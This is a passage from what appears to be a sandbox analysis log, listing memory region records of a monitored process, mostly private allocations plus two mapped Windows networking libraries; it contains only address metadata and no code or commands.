filename = "" Region: id = 1788 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1789 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1790 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1791 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1792 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1793 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1794 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1795 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1796 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1797 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1798 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1799 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1800 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1801 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1802 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1803 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1804 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1805 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1806 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1807 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1808 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1809 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1810 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1811 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1812 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1813 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1814 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1815 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1816 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1817 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1818 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1819 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1820 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1821 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1822 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1823 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1824 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1825 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1826 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1827 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1828 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1829 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1830 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1831 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1832 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1833 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1834 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1835 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1836 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1837 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1838 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1839 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1840 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1841 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1842 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1843 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1844 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1845 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1846 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1847 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1848 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1849 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1850 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1851 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1852 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1853 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1854 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1855 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1856 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1857 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1858 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1859 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1860 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1861 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1862 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1863 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1864 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1865 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1866 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1867 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1868 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1869 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1870 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1871 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1872 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1873 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1874 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1875 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1876 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1877 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1878 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1879 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1880 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1881 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1882 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1883 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1884 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1885 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1886 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1887 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1888 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1889 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1890 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1891 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1892 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1893 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1894 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1895 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1896 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1897 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1898 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1899 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1900 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1901 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1902 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1903 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1904 start_va = 0x72040000 end_va = 0x7208efff monitored = 0 entry_point = 0x7204d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1905 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1906 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1907 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1908 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1909 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1910 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1911 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1912 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1913 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1914 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1915 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1916 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1917 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1918 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1919 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1920 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1921 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1922 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1923 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1924 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1925 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1926 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1927 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1928 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1929 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1930 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1931 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1932 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1933 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1934 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1935 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1936 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1937 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1938 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1939 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1940 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1941 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1942 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1943 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1944 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1945 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1946 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1947 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1948 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1949 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1950 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1951 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1952 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1953 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1954 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1955 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1956 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1957 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1958 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1959 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1960 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1961 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1962 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1963 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1964 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1965 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1966 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1967 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1968 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1969 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1970 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1971 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1972 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1973 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1974 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1975 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1976 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1977 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1978 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1979 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1980 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1981 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1982 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1983 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1984 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1985 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1986 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1987 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1988 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1989 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1990 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1991 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1992 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1993 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1994 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 